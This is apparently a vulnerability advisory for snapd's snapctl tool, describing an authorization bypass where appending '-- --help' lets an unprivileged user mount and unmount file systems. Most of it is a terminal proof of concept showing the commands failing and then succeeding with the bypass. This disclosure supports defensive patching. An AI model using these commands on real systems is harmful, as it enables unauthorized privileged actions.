Improper Access Control Affecting github.com/snapcore/snapd/overlord/hookstate package, versions *

Affected versions of this package are vulnerable to Improper Access Control. In the snapctl tool, the authorization check can be bypassed via the inclusion of '-- --help' in the command line arguments. This issue arises due to the tool's failure to properly handle the context of the '-h' or '--help' parameters, allowing them to be used to bypass the requirement for the correct authorization (normally uid 0). An attacker can perform privileged actions, such as mounting or unmounting file systems, by exploiting this vulnerability.

rory@ubuntu2404release:~$ snap --version

snap 2.62+24.04build1

snapd 2.62+24.04build1

series 16

ubuntu 24.04

kernel 6.8.0-31-generic

rory@ubuntu2404release:~$ snap run --shell firefox

rory@ubuntu2404release:/home/rory$ mount | grep hunspell

/dev/sda2 on /var/snap/firefox/common/host-hunspell type ext4 (ro,noexec,noatime)

/dev/sda2 on /var/lib/snapd/hostfs/var/snap/firefox/common/host-hunspell type ext4 (ro,noexec,noatime)

rory@ubuntu2404release:/home/rory$ snapctl umount /var/snap/firefox/common/host-hunspell

error: cannot use "umount" with uid 1000, try with sudo

rory@ubuntu2404release:/home/rory$ snapctl umount /var/snap/firefox/common/host-hunspell -- --help

rory@ubuntu2404release:/home/rory$ mount | grep hunspell

rory@ubuntu2404release:/home/rory$ snapctl mount -oro,bind,noatime,noexec /usr/share/hunspell /var/snap/firefox/common/host-hunspell

error: cannot use "mount" with uid 1000, try with sudo

rory@ubuntu2404release:/home/rory$ snapctl mount -oro,bind,noatime,noexec /usr/share/hunspell /var/snap/firefox/common/host-hunspell -- --help

rory@ubuntu2404release:/home/rory$ mount | grep hunspell

/dev/sda2 on /var/lib/snapd/hostfs/var/snap/firefox/common/host-hunspell type ext4 (rw,relatime)

/dev/sda2 on /var/snap/firefox/common/host-hunspell type ext4 (rw,relatime)

• GitHub Commit
• snapd bug